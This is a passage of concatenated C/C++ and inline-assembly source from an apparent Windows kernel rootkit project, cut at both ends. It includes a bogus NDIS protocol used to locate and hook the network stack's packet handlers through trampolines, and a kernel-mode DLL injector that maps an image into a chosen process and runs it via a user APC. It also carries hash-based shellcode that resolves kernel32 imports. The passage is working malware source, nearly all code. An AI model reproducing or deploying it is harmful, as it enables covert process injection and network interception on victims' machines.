STATUS_SUCCESS; } //-------------------------------------------------------------------------------------- VOID OnReceiveComplete(NDIS_HANDLE ProtocolBindingContext) { /* This function is a required driver function in any protocol. ProtocolReceiveComplete completes post-processing of one or more preceding receive indications from a network adapter driver. 
*/ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- INT OnReceivePacket( NDIS_HANDLE ProtocolBindingContext, PNDIS_PACKET Packet) { /* ProtocolReceivePacket is an optional driver function that processes receive indications made by underlying connectionless NIC driver(s) that call either NdisMIndicateReceivePacket with packet arrays because the underlying driver supports multipacket receive indications or with individual packets that have associated out-of-band information. A call to ProtocolReceivePacket can also occur as a result of loopback. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif return STATUS_SUCCESS; } //-------------------------------------------------------------------------------------- NDIS_STATUS OnPnPHandler( NDIS_HANDLE ProtocolBindingContext, PNET_PNP_EVENT pNetPnPEvent) { #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif return STATUS_SUCCESS; } //-------------------------------------------------------------------------------------- NDIS_STATUS OnPnPNetEventReconfigure( ULONG pAdapt, PNET_PNP_EVENT pNetPnPEvent) { #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif return STATUS_SUCCESS; } //-------------------------------------------------------------------------------------- NDIS_STATUS OnPnPNetEventSetPower( ULONG pAdapt, PNET_PNP_EVENT pNetPnPEvent) { #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif return STATUS_SUCCESS; } //-------------------------------------------------------------------------------------- NDIS_HANDLE BogusProtocolRegister(void) { if (m_hBogusProtocol) { #ifdef DBG_NDIS_PROT // protocol is allready registered DbgMsg(__FUNCTION__"(): Protocol is allready registered\n"); #endif return m_hBogusProtocol; } NDIS_STATUS status = STATUS_SUCCESS; NDIS_PROTOCOL_CHARACTERISTICS Protocol; // fill protocol characteristics structure NdisZeroMemory(&Protocol, 
sizeof(Protocol)); Protocol.Ndis40Chars.MajorNdisVersion = 0x05; Protocol.Ndis40Chars.MinorNdisVersion = 0x0; Protocol.Ndis40Chars.OpenAdapterCompleteHandler = OnOpenAdapterComplete; Protocol.Ndis40Chars.CloseAdapterCompleteHandler = OnCloseAdapterComplete; Protocol.Ndis40Chars.SendCompleteHandler = OnSendComplete; Protocol.Ndis40Chars.TransferDataCompleteHandler = OnTransferDataComplete; Protocol.Ndis40Chars.ResetCompleteHandler = OnResetComplete; Protocol.Ndis40Chars.RequestCompleteHandler = OnRequestComplete; Protocol.Ndis40Chars.ReceiveHandler = OnReceive; Protocol.Ndis40Chars.ReceiveCompleteHandler = OnReceiveComplete; Protocol.Ndis40Chars.StatusHandler = OnStatus; Protocol.Ndis40Chars.StatusCompleteHandler = OnStatusComplete; Protocol.Ndis40Chars.BindAdapterHandler = OnBindAdapter; Protocol.Ndis40Chars.UnbindAdapterHandler = OnUnbindAdapter; Protocol.Ndis40Chars.UnloadHandler = OnUnload; Protocol.Ndis40Chars.ReceivePacketHandler = OnReceivePacket; Protocol.Ndis40Chars.PnPEventHandler = OnPnPHandler; NDIS_STRING ProtocolName; NdisInitUnicodeString(&ProtocolName, L"BogusProto"); Protocol.Ndis40Chars.Name = ProtocolName; // register our bogus protocol NdisRegisterProtocol( &status, &m_hBogusProtocol, &Protocol, sizeof(Protocol) ); if (status != NDIS_STATUS_SUCCESS) { DbgMsg("NdisRegisterProtocol() fails; status: 0x%.8x\n", status); return NULL; } #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"(): Protocol registered\n"); #endif return m_hBogusProtocol; } //-------------------------------------------------------------------------------------- void BogusProtocolUnregister(void) { if (m_hBogusProtocol) { NDIS_STATUS status = STATUS_SUCCESS; NdisDeregisterProtocol(&status, m_hBogusProtocol); m_hBogusProtocol = NULL; } } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_driver/bogusproto.h ================================================ NDIS_HANDLE 
BogusProtocolRegister(void); void BogusProtocolUnregister(void); ================================================ FILE: src/rootkit_driver/debug.h ================================================ #ifdef DBGMSG // debug messages is on #define DbgMsg DbgPrint #else #define DbgMsg #endif ================================================ FILE: src/rootkit_driver/dll_inject.cpp ================================================ #include "stdafx.h" #include "dll_inject_shellcode.h" ULONG SDT_NtProtectVirtualMemory = 0; int m_KTHREAD_ApcState = -1; KEVENT m_ApcEvent; //-------------------------------------------------------------------------------------- #ifdef _X86_ __declspec(naked) NTSTATUS NTAPI _ZwProtectVirtualMemory( HANDLE ProcessHandle, PVOID *BaseAddress, PSIZE_T NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection) { __asm { cmp SDT_NtProtectVirtualMemory, 0 jz _failed mov eax, SDT_NtProtectVirtualMemory lea edx, [esp + 4] int 0x2e retn 0x14 _failed: mov eax, 0xc00000001 retn 0x14 } } #endif // _X86_ //-------------------------------------------------------------------------------------- ULONG GetShellcodeSize(PVOID Data) { ULONG Size = 0; PULONG Ptr = (PULONG)Data; // get size of shellcode while (*Ptr != ENDM) { Size += 1; // check for end marker Ptr = (PULONG)((ULONG)Ptr + 1); } return Size; } //-------------------------------------------------------------------------------------- void InjectKernelApcRoutine( struct _KAPC *Apc, PKNORMAL_ROUTINE *NormalRoutine, PVOID *NormalContext, PVOID *SystemArgument1, PVOID *SystemArgument2) { DbgMsg(__FUNCTION__"()\n"); KeSetEvent(&m_ApcEvent, 0, FALSE); } //-------------------------------------------------------------------------------------- BOOLEAN InjectFindProcess(PWSTR ProcessName, ULONG ProcessId, PKTHREAD *pThread, PEPROCESS *pProcess) { BOOLEAN bRet = FALSE; UNICODE_STRING usProcessName; if (ProcessName) { RtlInitUnicodeString(&usProcessName, ProcessName); } *pThread = NULL; *pProcess = 
NULL; PSYSTEM_PROCESSES_INFORMATION pProcessesInfo = (PSYSTEM_PROCESSES_INFORMATION) RuntimeGetSystemInformation(SystemProcessInformation); if (pProcessesInfo) { PSYSTEM_PROCESSES_INFORMATION pInfo = pProcessesInfo; // iterate processes list while (pInfo) { if (pInfo->ProcessName.Buffer && pInfo->ThreadCount > 0) { // match by process name or ID if ((ProcessName != NULL && RtlEqualUnicodeString(&pInfo->ProcessName, &usProcessName, TRUE)) || (ProcessId != 0 && pInfo->ProcessId == ProcessId)) { DbgMsg( __FUNCTION__"(): \"%wZ\", PID = %d\n", &pInfo->ProcessName, pInfo->ProcessId ); NTSTATUS ns = PsLookupThreadByThreadId( pInfo->Threads[0].ClientId.UniqueThread, (PETHREAD *)pThread ); if (!NT_SUCCESS(ns)) { DbgMsg("PsLookupProcessByProcessId() ERROR; status: 0x%.8x\n", ns); } ns = PsLookupProcessByProcessId( (HANDLE)pInfo->ProcessId, pProcess ); if (!NT_SUCCESS(ns)) { DbgMsg("PsLookupProcessByProcessId() ERROR; status: 0x%.8x\n", ns); } if (*pThread && *pProcess) { bRet = TRUE; break; } else { if (*pThread) { ObDereferenceObject(*pThread); *pThread = NULL; } if (*pProcess) { ObDereferenceObject(*pProcess); *pProcess = NULL; } } } } if (pInfo->NextEntryDelta == 0) { // end of the list break; } pInfo = (PSYSTEM_PROCESSES_INFORMATION)((PUCHAR)pInfo + pInfo->NextEntryDelta); } ExFreePool(pProcessesInfo); } return bRet; } //-------------------------------------------------------------------------------------- BOOLEAN ImjectMapDllImage(HANDLE hProcess, PVOID Data, ULONG DataSize, PVOID *pRetImage) { PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)RVATOVA( Data, ((PIMAGE_DOS_HEADER)Data)->e_lfanew ); PVOID Image = NULL; ULONG ImageSize = pHeaders->OptionalHeader.SizeOfImage; // allocate memory for image NTSTATUS ns = ZwAllocateVirtualMemory( hProcess, (PVOID *)&Image, 0, &ImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); if (NT_SUCCESS(ns)) { DbgMsg(__FUNCTION__"(): Memory for image allocated at "IFMT"\n", Image); __try { // copy headers RtlZeroMemory(Image, 
ImageSize); RtlCopyMemory(Image, Data, pHeaders->OptionalHeader.SizeOfHeaders); // copy sections PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER) ((PUCHAR)&pHeaders->OptionalHeader + pHeaders->FileHeader.SizeOfOptionalHeader); for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++) { RtlCopyMemory( RVATOVA(Image, pSection->VirtualAddress), RVATOVA(Data, pSection->PointerToRawData), min(pSection->SizeOfRawData, pSection->Misc.VirtualSize) ); pSection++; } // parse image base relocations if (RuntimeProcessRelocs(Image, Image)) { *pRetImage = Image; return TRUE; } } __except(EXCEPTION_EXECUTE_HANDLER) { DbgMsg(__FUNCTION__"() EXCEPTION\n"); } ZwFreeVirtualMemory(hProcess, &Image, 0, MEM_RELEASE); } else { DbgMsg("ZwAllocateVirtualMemory() fails; status: 0x%.8x\n", ns); } return NULL; } //-------------------------------------------------------------------------------------- BOOLEAN InjectIntoProcess(PEPROCESS Process, PKTHREAD Thread, PVOID Data, ULONG DataSize) { #ifdef USE_PARANOID_CHEKS if (m_KTHREAD_ApcState < 0) { DbgMsg(__FUNCTION__"() ERROR: Some offsets are not initialized\n"); return FALSE; } #endif // USE_PARANOID_CHEKS BOOLEAN bRet = FALSE; HANDLE hProcess = NULL; // get handle to the target process NTSTATUS ns = ObOpenObjectByPointer( Process, OBJ_KERNEL_HANDLE, NULL, 0, NULL, KernelMode, &hProcess ); if (NT_SUCCESS(ns)) { PROCESS_BASIC_INFORMATION ProcessInfo; // get address of PEB ns = ZwQueryInformationProcess( hProcess, ProcessBasicInformation, &ProcessInfo, sizeof(ProcessInfo), NULL ); if (!NT_SUCCESS(ns)) { DbgMsg("ZwQueryInformationProcess() fails; status: 0x%.8x\n", ns); goto close; } // attach to the process address space KAPC_STATE ApcState; KeStackAttachProcess(Process, &ApcState); // get process image base from peb PVOID ProcessImageBase = *(PVOID *)((PUCHAR)ProcessInfo.PebBaseAddress + PEB_IMAGE_BASE_OFFEST); // map DLL image into the target process PVOID Image = NULL; if (ImjectMapDllImage(hProcess, Data, DataSize, &Image)) { 
__try { PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)RVATOVA( Image, ((PIMAGE_DOS_HEADER)Data)->e_lfanew ); PVOID ImageEntryPoint = RVATOVA(Image, pHeaders->OptionalHeader.AddressOfEntryPoint); DbgMsg(__FUNCTION__"(): Image entry point is at "IFMT"\n", ImageEntryPoint); PINJ_THREAD_STRUCT InjectStruct = NULL; ULONG ShellCodeSize = GetShellcodeSize(inj_shellcode); ULONG InjectStructSize = sizeof(INJ_THREAD_STRUCT) + ShellCodeSize; // allocate memory for callgate NTSTATUS ns = ZwAllocateVirtualMemory( hProcess, (PVOID *)&InjectStruct, 0, &InjectStructSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); if (NT_SUCCESS(ns)) { DbgMsg("Callgate allocated at "IFMT"\n", InjectStruct); RtlFillMemory(InjectStruct, InjectStructSize, 0x90); #define DLL_PROCESS_ATTACH 0x01 #define REL_OP(_to_, _from_) \ \ (ULONG)((PUCHAR)&InjectStruct->##_to_ - \ (PUCHAR)&InjectStruct->##_from_) - sizeof(ULONG) #ifdef _X86_ InjectStruct->u0_0x68 = 0x68; /* PUSH Image */ InjectStruct->Image = (ULONG)Image; InjectStruct->u1_0xE8 = 0xE8; /* CALL ProcessModuleImports */ InjectStruct->ShellCodeAddr = REL_OP(ShellCode, ShellCodeAddr); InjectStruct->u2_0xC085 = 0xC085; /* TEST EAX, EAX */ InjectStruct->u3_0x840F = 0x840F; /* JZ Exit */ InjectStruct->ExitAddr = REL_OP(u8_0xC2, ExitAddr); InjectStruct->u4_0x68 = 0x68; /* PUSH 0 */ InjectStruct->param_Reserved = 0; InjectStruct->u5_0x68 = 0x68; /* PUSH DLL_PROCESS_ATTACH */ InjectStruct->param_Reason = DLL_PROCESS_ATTACH; InjectStruct->u6_0x68 = 0x68; /* PUSH ModuleInstance */ InjectStruct->ModuleInstance = (ULONG)Image; InjectStruct->u7_0xE8 = 0xe8; /* CALL ImageEntryPoint */ InjectStruct->ImageEntryPoint = (ULONG)((PUCHAR)ImageEntryPoint - (PUCHAR)&InjectStruct->ImageEntryPoint) - sizeof(ULONG); InjectStruct->u8_0xC2 = 0xc2; /* RET 3 */ InjectStruct->param_local_size = 3; #else // _X86_ #error __FUNCTION__ is x86 only #endif // _X86_ // copy shellcode, that processing module imports RtlCopyMemory(&InjectStruct->ShellCode, inj_shellcode, 
ShellCodeSize); KAPC Apc; PKAPC_STATE pThreadApcState = (PKAPC_STATE)((PUCHAR)Thread + m_KTHREAD_ApcState); KeInitializeApc( &Apc, Thread, OriginalApcEnvironment, &InjectKernelApcRoutine, NULL, (PKNORMAL_ROUTINE)InjectStruct, UserMode, NULL ); // enable user APC delivering pThreadApcState->UserApcPending = TRUE; // add routine to the APC queue if (KeInsertQueueApc(&Apc, NULL, NULL, 0)) { LARGE_INTEGER Timeout; Timeout.QuadPart = TIME_RELATIVE(TIME_SECONDS(1)); // waiting for APC completion ns = KeWaitForSingleObject(&m_ApcEvent, Executive, KernelMode, FALSE, &Timeout); if (ns == STATUS_TIMEOUT) { DbgMsg(__FUNCTION__"(): Error while delivering APC\n"); } else if (NT_SUCCESS(ns)) { DbgMsg(__FUNCTION__"(): APC delivered!\n"); bRet = TRUE; } // sleep for 1 sec. KeDelayExecutionThread(KernelMode, FALSE, &Timeout); } else { DbgMsg("KeInsertQueueApc() ERROR\n"); } } else { DbgMsg("ZwAllocateVirtualMemory() fails; status: 0x%.8x\n", ns); } } __except(EXCEPTION_EXECUTE_HANDLER) { DbgMsg(__FUNCTION__"() EXCEPTION\n"); } } KeUnstackDetachProcess(&ApcState); close: ZwClose(hProcess); } else { DbgMsg("ObOpenObjectByPointer() fails; status: 0x%.8x\n", ns); } return bRet; } //-------------------------------------------------------------------------------------- BOOLEAN InjectIntoProcessByName(PWSTR ProcessName, PVOID Data, ULONG DataSize) { BOOLEAN bRet = FALSE; PEPROCESS Process = NULL; PKTHREAD Thread = NULL; // lookup for process by name if (InjectFindProcess(ProcessName, 0, &Thread, &Process)) { // perform DLL injection bRet = InjectIntoProcess(Process, Thread, Data, DataSize); ObDereferenceObject(Process); ObDereferenceObject(Thread); } else { DbgMsg(__FUNCTION__"() ERROR: Unable to find process \"%ws\"\n", ProcessName); } return bRet; } //-------------------------------------------------------------------------------------- BOOLEAN InjectIntoProcessById(ULONG ProcessId, PVOID Data, ULONG DataSize) { BOOLEAN bRet = FALSE; PEPROCESS Process = NULL; PKTHREAD Thread = NULL; // 
lookup for process by ID if (InjectFindProcess(NULL, ProcessId, &Thread, &Process)) { // perform DLL injection bRet = InjectIntoProcess(Process, Thread, Data, DataSize); ObDereferenceObject(Process); ObDereferenceObject(Thread); } else { DbgMsg(__FUNCTION__"() ERROR: Unable to find process PID=%d\n", ProcessId); } return bRet; } //-------------------------------------------------------------------------------------- BOOLEAN InjectInitialize(void) { RTL_OSVERSIONINFOEXW VersionInformation; VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation); if (!NT_SUCCESS(RtlGetVersion((PRTL_OSVERSIONINFOW)&VersionInformation))) { return FALSE; } if (VersionInformation.dwMajorVersion == 5 && VersionInformation.dwMinorVersion == 1) { // XP SDT_NtProtectVirtualMemory = 0x0089; #ifdef _X86_ m_KTHREAD_ApcState = 0x34; #endif } else if ( VersionInformation.dwMajorVersion == 5 && VersionInformation.dwMinorVersion == 2) { // Server 2003 SDT_NtProtectVirtualMemory = 0x008f; #ifdef _X86_ m_KTHREAD_ApcState = 0x28; #endif if (VersionInformation.wServicePackMajor == 0 && VersionInformation.wServicePackMinor == 0) { // Service Pack 0, special case #ifdef _X86_ m_KTHREAD_ApcState = 0x34; #endif } } else if ( VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion == 0) { // Vista if (VersionInformation.wServicePackMajor == 0 && VersionInformation.wServicePackMinor == 0) { // Service Pack 0, special case SDT_NtProtectVirtualMemory = 0x00cf; } else { SDT_NtProtectVirtualMemory = 0x00d2; } #ifdef _X86_ m_KTHREAD_ApcState = 0x38; #endif } else if ( VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion == 1) { // 7 SDT_NtProtectVirtualMemory = 0x00d7; #ifdef _X86_ m_KTHREAD_ApcState = 0x40; #endif } else { DbgMsg(__FUNCTION__"() ERROR: Unknown NT version\n"); return FALSE; } DbgMsg("NtProtectVirtualMemory() SDT number is 0x%x\n", SDT_NtProtectVirtualMemory); KeInitializeEvent(&m_ApcEvent, SynchronizationEvent, FALSE); return TRUE; } 
//-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_driver/dll_inject.h ================================================ #ifdef _X86_ #define PEB_IMAGE_BASE_OFFEST 0x08 #elif _AMD64_ #define PEB_IMAGE_BASE_OFFEST 0x10 #endif /** * Callgate for execution library with CreateRemoteThread() */ #pragma pack(1) typedef struct _INJ_THREAD_STRUCT { // push ModuleBase UCHAR u0_0x68; ULONG Image; // call ProcessModuleImports UCHAR u1_0xE8; ULONG ShellCodeAddr; // test eax,eax USHORT u2_0xC085; // jz exit USHORT u3_0x840F; ULONG ExitAddr; // push param_1 UCHAR u4_0x68; ULONG param_Reserved; // push param_2 UCHAR u5_0x68; ULONG param_Reason; // push param_3 UCHAR u6_0x68; ULONG ModuleInstance; // call ImageEntryPoint UCHAR u7_0xE8; ULONG ImageEntryPoint; // retn 3 UCHAR u8_0xC2; USHORT param_local_size; UCHAR ShellCode[]; } INJ_THREAD_STRUCT, *PINJ_THREAD_STRUCT; #pragma pack() NTSTATUS NTAPI _ZwProtectVirtualMemory( HANDLE ProcessHandle, PVOID *BaseAddress, PSIZE_T NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection ); BOOLEAN InjectInitialize(void); BOOLEAN InjectIntoProcess(PEPROCESS Process, PKTHREAD Thread, PVOID Data, ULONG DataSize); BOOLEAN InjectIntoProcessByName(PWSTR ProcessName, PVOID Data, ULONG DataSize); BOOLEAN InjectIntoProcessById(ULONG ProcessId, PVOID Data, ULONG DataSize); ================================================ FILE: src/rootkit_driver/dll_inject_shellcode.h ================================================ #define EMIT(_data_) __asm __emit _data_ #define _ __asm __emit #define h_LoadLibraryA 0xA412FD89 #define h_GetProcAddress 0xF2509B84 #define h_LoadLibraryExA 0x04BF60E8 #define ENDM 'DNE~' /** * Shellcode for setting up library imports */ __declspec(naked) ULONG __stdcall inj_shellcode(PVOID Addr) { ULONG fLoadLibraryA, fGetProcAddress, bRet; __asm { push ebp mov ebp, esp sub esp, __LOCAL_SIZE pushad call 
_realloc _realloc: // calculate shellcode address pop ebx sub ebx, _realloc call _get_kernel_32 mov esi, eax push h_LoadLibraryExA push esi call _get_proc_addr // get address of KERNEL32.DLL push 0 push 0 lea ecx, [ebx + _kernel32_name] push ecx call eax mov esi, eax push h_LoadLibraryA push esi call _get_proc_addr mov fLoadLibraryA, eax push h_GetProcAddress push esi call _get_proc_addr mov fGetProcAddress, eax push fGetProcAddress push fLoadLibraryA mov eax, [ebp + 8] push eax call _process_imports mov bRet, eax popad mov eax, bRet mov esp, ebp pop ebp retn 0x04 _calc_hash: push ebp mov ebp, esp mov eax, [ebp + 8] push edx xor edx, edx _calc_hash_next: rol edx, 3 xor dl, [eax] inc eax cmp [eax], 0 jnz _calc_hash_next mov eax, edx pop edx pop ebp retn 4 _get_kernel_32: push esi xor eax, eax mov eax, fs:[0x30] js _find_kernel_9x mov eax, [eax + 0x0c] mov esi, [eax + 0x1c] lodsd mov eax, [eax + 0x8] jmp _find_kernel_end _find_kernel_9x: mov eax, [eax + 0x34] lea eax, [eax + 0x7c] mov eax, [eax + 0x3c] _find_kernel_end: pop esi ret _get_proc_addr: push ebp mov ebp, esp push ebx push esi push edi xor eax, eax mov ebx, [ebp + 0Ch] mov esi, [ebp + 8] mov edi, esi add esi, [esi + 3Ch] mov ecx, [esi + 78h] add ecx, edi mov edx, [ecx + 1ch] push edx mov edx, [ecx + 24h] push edx mov esi, [ecx + 20h] add esi, edi cdq dec edx _next_func: lodsd inc edx add eax, [ebp + 8] push eax call _calc_hash cmp eax, ebx jnz _next_func mov eax, [ebp + 8] xchg eax, edx pop esi add esi, edx shl eax, 1 add eax, esi xor ecx, ecx movzx ecx, word ptr [eax] pop edi shl ecx, 2 add ecx, edx add ecx, edi mov eax, [ecx] add eax, edx pop edi pop esi pop ebx pop ebp retn 8 _process_imports: push ebp mov ebp, esp sub esp, 0x10 push ebx mov ebx, [ebp + 8] test ebx, ebx push esi push edi je _l067 mov eax, [ebx + 0x3c] mov edi, [eax + ebx + 0x80] add edi, ebx jmp _l058 _l013: mov eax, [edi + 0xc] add eax, ebx mov [ebp - 4], eax push [ebp - 4] call [ebp + 0x0c] mov [ebp + 8], eax cmp dword ptr [ebp + 8], 0 
je _l067 cmp dword ptr [edi + 4], -1 jnz _l025 mov eax, [edi] jmp _l026 _l025: mov eax, [edi + 0x10] _l026: mov [ebp - 4], eax lea esi,[eax + ebx] jmp _l055 _l029: mov eax, [esi] test eax, 0xf0000000 je _l040 and eax, 0x0ffff mov [ebp - 8], eax push [ebp - 8] push [ebp + 8] call [ebp + 0x10] mov [ebp - 0x0c], eax mov eax, [ebp - 0x0c] jmp _l047 _l040: lea eax, [eax + ebx + 2] mov [ebp - 8], eax push [ebp - 8] push [ebp + 8] call [ebp + 0x10] mov [ebp - 0x10], eax mov eax, [ebp - 0x10] _l047: test eax, eax mov [esi], eax je _l067 mov eax, [edi + 0x10] sub eax, [ebp - 4] mov ecx, [esi] mov [eax + esi], ecx add esi, 4 _l055: cmp dword ptr [esi], 0 jnz _l029 add edi, 0x14 _l058: cmp dword ptr [edi], 0 jnz _l013 xor eax, eax inc eax _l062: pop edi pop esi pop ebx leave retn 0x0c _l067: xor eax, eax jmp _l062 _kernel32_name: EMIT('k' _ 'e' _ 'r' _ 'n' _ 'e' _ 'l' _ '3' _ '2' _ 0) } // shellcode's end marker EMIT('~' _ 'E' _ 'N' _ 'D') } ================================================ FILE: src/rootkit_driver/ndis_hook.cpp ================================================ #include "stdafx.h" // NDIS version: 6.0 #define NDIS60 1 extern "C" { #include } #include "bogusproto.h" #pragma alloc_text(INIT, NdisHookProtocolFind) #pragma alloc_text(INIT, NdisHookProtocolEnumOpened) #pragma alloc_text(INIT, NdisHookOpenGetMiniport) #pragma alloc_text(INIT, NdisHookAllocJump) #pragma alloc_text(INIT, NdisHookSet) // field offsets for NDIS structures int NDIS_PROTOCOL_BLOCK_Name = -1, NDIS_PROTOCOL_BLOCK_OpenQueue = -1, NDIS_PROTOCOL_BLOCK_NextProtocol = -1, NDIS_OPEN_BLOCK_ProtocolNextOpen = -1, NDIS_OPEN_BLOCK_MiniportHandle = -1, NDIS_MINIPORT_BLOCK_InterruptEx = -1, NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler = -1, NDIS_INTERRUPT_BLOCK_MiniportDpc = -1; NDIS_HOOK_BUFFER_HANDLER m_Handler = NULL; //-------------------------------------------------------------------------------------- BOOLEAN NdisHookInitialize(NDIS_HOOK_BUFFER_HANDLER Handler) { UINT NdisVersion = 
NdisGetVersion(); if (NdisVersion != 0x60014) { DbgMsg(__FUNCTION__"() ERROR: NDIS version 0x%x is not supported\n", NdisVersion); return FALSE; } m_Handler = Handler; #ifdef _X86_ NDIS_PROTOCOL_BLOCK_OpenQueue = 0x00c; NDIS_PROTOCOL_BLOCK_NextProtocol = 0x008; NDIS_PROTOCOL_BLOCK_Name = 0x024; NDIS_OPEN_BLOCK_ProtocolNextOpen = 0x0dc; NDIS_OPEN_BLOCK_MiniportHandle = 0x008; NDIS_MINIPORT_BLOCK_InterruptEx = 0x1c0; NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler = 0x19c; NDIS_INTERRUPT_BLOCK_MiniportDpc = 0x010; #endif return TRUE; } //-------------------------------------------------------------------------------------- PVOID NdisHookProtocolFind(PVOID hBogusProtocol, PUNICODE_STRING usProtocol) { #ifdef USE_PARANOID_CHEKS if (NDIS_PROTOCOL_BLOCK_Name < 0 || NDIS_PROTOCOL_BLOCK_NextProtocol < 0) { DbgMsg(__FUNCTION__"() ERROR: Some offsets are not initialized\n"); return NULL; } #endif // USE_PARANOID_CHEKS PUCHAR Protocol = (PUCHAR)hBogusProtocol; // enumerate registered NDIS protocols while (Protocol) { PUNICODE_STRING ProtocolName = (PUNICODE_STRING)(Protocol + NDIS_PROTOCOL_BLOCK_Name); // find TCPIP protocol if (RtlEqualUnicodeString(ProtocolName, usProtocol, TRUE)) { return Protocol; } Protocol = *(PUCHAR *)(Protocol + NDIS_PROTOCOL_BLOCK_NextProtocol); } return NULL; } //-------------------------------------------------------------------------------------- PVOID NdisHookProtocolEnumOpened(PVOID Protocol, PVOID OpenBlock) { #ifdef USE_PARANOID_CHEKS if (NDIS_PROTOCOL_BLOCK_OpenQueue < 0 || NDIS_OPEN_BLOCK_ProtocolNextOpen < 0) { DbgMsg(__FUNCTION__"() ERROR: Some offsets are not initialized\n"); return NULL; } #endif // USE_PARANOID_CHEKS if (OpenBlock) { return *(PVOID *)((PUCHAR)OpenBlock + NDIS_OPEN_BLOCK_ProtocolNextOpen); } else { return *(PVOID *)((PUCHAR)Protocol + NDIS_PROTOCOL_BLOCK_OpenQueue); } return NULL; } //-------------------------------------------------------------------------------------- PVOID NdisHookOpenGetMiniport(PVOID OpenBlock) { 
#ifdef USE_PARANOID_CHEKS if (NDIS_OPEN_BLOCK_MiniportHandle < 0) { DbgMsg(__FUNCTION__"() ERROR: Some offsets are not initialized\n"); return NULL; } #endif // USE_PARANOID_CHEKS return *(PVOID *)((PUCHAR)OpenBlock + NDIS_OPEN_BLOCK_MiniportHandle); } //-------------------------------------------------------------------------------------- NDIS_STATUS CopyNBLToBuffer(PNET_BUFFER_LIST NetBufferList, PVOID *pDest, PULONG pBytesCopied) { NDIS_STATUS Status = NDIS_STATUS_SUCCESS; PNET_BUFFER CurrentNetBuffer; __try { *pBytesCopied = 0; for (CurrentNetBuffer = NET_BUFFER_LIST_FIRST_NB(NetBufferList); CurrentNetBuffer != NULL; CurrentNetBuffer = NET_BUFFER_NEXT_NB(CurrentNetBuffer)) { PMDL CurrentMdl = NET_BUFFER_CURRENT_MDL(CurrentNetBuffer); PUCHAR pSrc = (PUCHAR)MmGetSystemAddressForMdlSafe(CurrentMdl, NormalPagePriority); if (pSrc == NULL) { if (*pDest && *pBytesCopied > 0) { ExFreePool(*pDest); } Status = NDIS_STATUS_RESOURCES; __leave; } // For the first MDL with data, we need to skip the free space pSrc += NET_BUFFER_CURRENT_MDL_OFFSET(CurrentNetBuffer); LONG CurrLength = MmGetMdlByteCount(CurrentMdl) - NET_BUFFER_CURRENT_MDL_OFFSET(CurrentNetBuffer); if (CurrLength > 0) { ULONG CopyLegth = *pBytesCopied + CurrLength; PUCHAR CopyBuff = (PUCHAR)ExAllocatePool(NonPagedPool, CopyLegth); if (CopyBuff) { if (*pDest && *pBytesCopied > 0) { RtlCopyMemory(CopyBuff, *pDest, *pBytesCopied); ExFreePool(*pDest); } // Copy the data. 
NdisMoveMemory(CopyBuff + *pBytesCopied, pSrc, CurrLength); *pDest = CopyBuff; } else { if (*pDest && *pBytesCopied > 0) { ExFreePool(*pDest); } Status = NDIS_STATUS_RESOURCES; __leave; } *pBytesCopied += CurrLength; pDest += CurrLength; } CurrentMdl = NDIS_MDL_LINKAGE(CurrentMdl); while (CurrentMdl) { pSrc = (PUCHAR)MmGetSystemAddressForMdlSafe(CurrentMdl, NormalPagePriority); if (!pSrc) { if (*pDest && *pBytesCopied > 0) { ExFreePool(*pDest); } Status = NDIS_STATUS_RESOURCES; __leave; } CurrLength = MmGetMdlByteCount(CurrentMdl); if (CurrLength > 0) { ULONG CopyLegth = *pBytesCopied + CurrLength; PUCHAR CopyBuff = (PUCHAR)ExAllocatePool(NonPagedPool, CopyLegth); if (CopyBuff) { if (*pDest && *pBytesCopied > 0) { RtlCopyMemory(CopyBuff, *pDest, *pBytesCopied); ExFreePool(*pDest); } // Copy the data. NdisMoveMemory(CopyBuff + *pBytesCopied, pSrc, CurrLength); *pDest = CopyBuff; } else { if (*pDest && *pBytesCopied > 0) { ExFreePool(*pDest); } Status = NDIS_STATUS_RESOURCES; __leave; } *pBytesCopied += CurrLength; pDest += CurrLength; } CurrentMdl = NDIS_MDL_LINKAGE(CurrentMdl); } } } __finally { } return Status; } //-------------------------------------------------------------------------------------- #ifdef _X86_ #pragma pack(push, 1) typedef struct _HOOK_STRUCT { UCHAR op1_0x58; /* POP EAX */ UCHAR op2_0x68; /* PUSH OldHandler */ PVOID OldHandler; UCHAR op3_0x68; /* PUSH OldHandlerContext */ PVOID OldHandlerContext; UCHAR op4_0x50; /* PUSH EAX */ UCHAR op5_0x68; /* PUSH Handler */ PVOID Handler; UCHAR op6_0xc3; /* RET */ } HOOK_STRUCT, *PHOOK_STRUCT; #pragma pack(pop) PVOID NdisHookAlloc(PVOID OldHandler, PVOID OldHandlerContext, PVOID Handler) { // allocate trampoline for hook handler calling PHOOK_STRUCT HookStruct = (PHOOK_STRUCT)ExAllocatePool(NonPagedPool, sizeof(HOOK_STRUCT)); if (HookStruct) { HookStruct->op1_0x58 = 0x58; HookStruct->op2_0x68 = 0x68; HookStruct->OldHandler = OldHandler; HookStruct->op3_0x68 = 0x68; HookStruct->OldHandlerContext = 
